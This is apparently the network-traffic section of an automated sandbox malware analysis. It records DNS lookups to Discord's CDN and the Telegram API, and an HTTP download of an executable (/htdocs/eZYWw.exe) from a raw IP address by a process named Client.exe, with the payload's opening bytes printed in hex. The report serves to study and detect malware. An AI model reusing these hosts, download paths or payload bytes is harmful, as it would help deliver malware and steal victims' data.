                                                                                        Aug 8, 2022 17:18:44.773762941 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.773794889 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.773833036 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.773845911 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.773873091 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.773910999 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.773921967 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.773950100 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.773988962 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.773996115 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774029016 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774068117 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774076939 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774108887 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774147034 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774158955 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774187088 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774226904 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774241924 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774266005 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774307966 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774323940 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774347067 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774388075 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774401903 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774429083 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774466991 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774487019 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774507046 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774545908 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774561882 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774585009 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774626017 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774638891 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774666071 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774707079 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774719000 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774751902 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774791002 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774802923 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774831057 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774871111 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774888992 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774909973 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774950027 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.774964094 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.774991035 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.775031090 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.775044918 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.775073051 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.775110960 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.775150061 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.775212049 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806039095 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806082964 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806101084 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806123972 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806145906 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806154013 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806168079 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806191921 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806215048 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806237936 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806245089 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806262970 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806287050 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806288004 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806308031 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806324959 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806340933 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806341887 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806359053 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806375027 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806375980 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806395054 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806411028 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806427956 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806444883 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806446075 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806462049 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806473970 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806479931 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806497097 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806505919 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806516886 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806535006 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806545973 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806551933 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806570053 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806580067 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806587934 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806605101 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806617022 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806622028 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806639910 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806657076 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806668043 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806674957 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806691885 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806709051 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806725979 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806740999 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806741953 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806760073 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806777954 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806788921 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806794882 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806824923 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:44.806838989 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806858063 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806870937 CEST8049180109.206.241.81192.168.2.22
                                                                                        Aug 8, 2022 17:18:44.806919098 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:47.848061085 CEST49181443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:47.848131895 CEST44349181149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:47.848243952 CEST49181443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:47.858860016 CEST49181443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:47.858892918 CEST44349181149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:47.920501947 CEST44349181149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:47.920597076 CEST49181443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:47.936271906 CEST49181443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:47.936322927 CEST44349181149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:47.936939001 CEST44349181149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:48.133795023 CEST49181443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:48.156822920 CEST4918080192.168.2.22109.206.241.81
                                                                                        Aug 8, 2022 17:18:49.110600948 CEST49181443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:49.142469883 CEST44349181149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:49.335290909 CEST49181443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:52.801616907 CEST49181443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:56.518573046 CEST49182443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:56.518646002 CEST44349182149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:56.518734932 CEST49182443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:56.525149107 CEST49182443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:56.525191069 CEST44349182149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:56.585803032 CEST44349182149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:56.586049080 CEST49182443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:56.607180119 CEST49182443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:56.607229948 CEST44349182149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:56.607897997 CEST44349182149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:56.815401077 CEST44349182149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:56.816597939 CEST49182443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:57.143824100 CEST49182443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:57.171175957 CEST44349182149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:57.172139883 CEST49182443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:57.215446949 CEST44349182149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:57.572231054 CEST44349182149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:57.572474957 CEST44349182149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:57.572676897 CEST49182443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:57.575484037 CEST49182443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:59.787409067 CEST49183443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:59.787471056 CEST44349183149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:59.788853884 CEST49183443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:59.793082952 CEST49183443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:59.793116093 CEST44349183149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:59.850938082 CEST44349183149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:59.874164104 CEST49183443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:59.874207020 CEST44349183149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:59.904000998 CEST44349183149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:59.906922102 CEST49183443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:59.907066107 CEST44349183149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:18:59.907295942 CEST49183443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:18:59.907320023 CEST44349183149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:19:00.265611887 CEST44349183149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:19:00.265696049 CEST44349183149.154.167.220192.168.2.22
                                                                                        Aug 8, 2022 17:19:00.265889883 CEST49183443192.168.2.22149.154.167.220
                                                                                        Aug 8, 2022 17:19:00.266614914 CEST49183443192.168.2.22149.154.167.220
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Aug 8, 2022 17:18:09.668448925 CEST5586853192.168.2.228.8.8.8
                                                                                        Aug 8, 2022 17:18:09.689707994 CEST53558688.8.8.8192.168.2.22
                                                                                        Aug 8, 2022 17:18:21.336635113 CEST4968853192.168.2.228.8.8.8
                                                                                        Aug 8, 2022 17:18:21.356662035 CEST53496888.8.8.8192.168.2.22
                                                                                        Aug 8, 2022 17:18:23.649310112 CEST5883653192.168.2.228.8.8.8
                                                                                        Aug 8, 2022 17:18:23.668286085 CEST53588368.8.8.8192.168.2.22
                                                                                        Aug 8, 2022 17:18:37.983858109 CEST5013453192.168.2.228.8.8.8
                                                                                        Aug 8, 2022 17:18:38.007226944 CEST53501348.8.8.8192.168.2.22
                                                                                        Aug 8, 2022 17:18:43.499875069 CEST5527553192.168.2.228.8.8.8
                                                                                        Aug 8, 2022 17:18:43.522581100 CEST53552758.8.8.8192.168.2.22
                                                                                        Aug 8, 2022 17:18:47.790354013 CEST5991553192.168.2.228.8.8.8
                                                                                        Aug 8, 2022 17:18:47.807266951 CEST53599158.8.8.8192.168.2.22
                                                                                        Aug 8, 2022 17:18:56.392419100 CEST5440853192.168.2.228.8.8.8
                                                                                        Aug 8, 2022 17:18:56.411427021 CEST53544088.8.8.8192.168.2.22
                                                                                        Aug 8, 2022 17:18:56.427946091 CEST5440853192.168.2.228.8.8.8
                                                                                        Aug 8, 2022 17:18:56.446690083 CEST53544088.8.8.8192.168.2.22
                                                                                        Aug 8, 2022 17:18:59.765098095 CEST5010853192.168.2.228.8.8.8
                                                                                        Aug 8, 2022 17:18:59.783803940 CEST53501088.8.8.8192.168.2.22
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                        Aug 8, 2022 17:18:09.668448925 CEST192.168.2.228.8.8.80x58dcStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:21.336635113 CEST192.168.2.228.8.8.80xde81Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:23.649310112 CEST192.168.2.228.8.8.80x5175Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:37.983858109 CEST192.168.2.228.8.8.80x8264Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:43.499875069 CEST192.168.2.228.8.8.80xbb2eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:47.790354013 CEST192.168.2.228.8.8.80x2652Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:56.392419100 CEST192.168.2.228.8.8.80x1bbbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:56.427946091 CEST192.168.2.228.8.8.80x1bbbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:59.765098095 CEST192.168.2.228.8.8.80x30aaStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                        Aug 8, 2022 17:18:09.689707994 CEST8.8.8.8192.168.2.220x58dcNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:09.689707994 CEST8.8.8.8192.168.2.220x58dcNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:09.689707994 CEST8.8.8.8192.168.2.220x58dcNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:09.689707994 CEST8.8.8.8192.168.2.220x58dcNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:09.689707994 CEST8.8.8.8192.168.2.220x58dcNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:21.356662035 CEST8.8.8.8192.168.2.220xde81No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:23.668286085 CEST8.8.8.8192.168.2.220x5175No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:38.007226944 CEST8.8.8.8192.168.2.220x8264No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:38.007226944 CEST8.8.8.8192.168.2.220x8264No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:38.007226944 CEST8.8.8.8192.168.2.220x8264No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:38.007226944 CEST8.8.8.8192.168.2.220x8264No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:38.007226944 CEST8.8.8.8192.168.2.220x8264No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:43.522581100 CEST8.8.8.8192.168.2.220xbb2eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:43.522581100 CEST8.8.8.8192.168.2.220xbb2eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:43.522581100 CEST8.8.8.8192.168.2.220xbb2eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:43.522581100 CEST8.8.8.8192.168.2.220xbb2eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:43.522581100 CEST8.8.8.8192.168.2.220xbb2eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:47.807266951 CEST8.8.8.8192.168.2.220x2652No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:56.411427021 CEST8.8.8.8192.168.2.220x1bbbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:56.446690083 CEST8.8.8.8192.168.2.220x1bbbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                        Aug 8, 2022 17:18:59.783803940 CEST8.8.8.8192.168.2.220x30aaNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                        • cdn.discordapp.com
                                                                                        • api.telegram.org
                                                                                        • 109.206.241.81
                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        0192.168.2.2249173162.159.134.233443C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        1192.168.2.2249175149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        10192.168.2.2249180109.206.241.8180C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Aug 8, 2022 17:18:44.650859118 CEST679OUTGET /htdocs/eZYWw.exe HTTP/1.1
                                                                                        Host: 109.206.241.81
                                                                                        Connection: Keep-Alive
                                                                                        Aug 8, 2022 17:18:44.683948994 CEST680INHTTP/1.1 200 OK
                                                                                        Date: Mon, 08 Aug 2022 15:18:44 GMT
                                                                                        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                                                        Last-Modified: Sun, 07 Aug 2022 10:26:43 GMT
                                                                                        ETag: "34400-5e5a422bc1ac2"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 214016
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-msdownload
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02 03 28 11 00 00 0a 28 12 00 00 0a 2a 00 00 13 30 02 00 28 00 00 00 06 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02 28 13 00 00 0a 2a 13 30 02 00 2c 00 00 00 07 00 00 11 16 0b 2b 1b 00 07 17 fe
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTb<[ @ @x[S` H.text; < `.rsrc`>@@.relocB@B[H(*(*ssss*0,+,,,++~o*0,+,,,++~o*0,+,,,++~o*0,+,,,++~o*0.+,,,++((*0(+,,,++(*0,+
                                                                                        Aug 8, 2022 17:18:44.683975935 CEST681INData Raw: 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 d0 05 00 00 02 28 14 00 00 0a 2a 13 30 02 00 28 00 00 00 08 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02
                                                                                        Data Ascii: ,,,++(*0(+,,,++(*0C+;,,-%,(+*,,++*0*(*0O+C,~-2
                                                                                        Aug 8, 2022 17:18:44.683995962 CEST683INData Raw: 61 02 00 06 28 23 00 00 0a 28 38 00 00 0a 26 de 0c 28 2d 00 00 0a 28 2e 00 00 0a de 00 2a 01 10 00 00 00 00 07 00 30 37 00 0c 1d 00 00 01 1b 30 03 00 d1 01 00 00 10 00 00 11 7e 15 00 00 04 39 c6 01 00 00 7e 18 00 00 04 7e 14 00 00 04 16 28 30 00
                                                                                        Data Ascii: a(#(8&(-(.*070~9~~(0;(]("(b(#(9-(]("(b(#(:&~(;,[~(<(=+.o>o?(<(03o@2(-(.
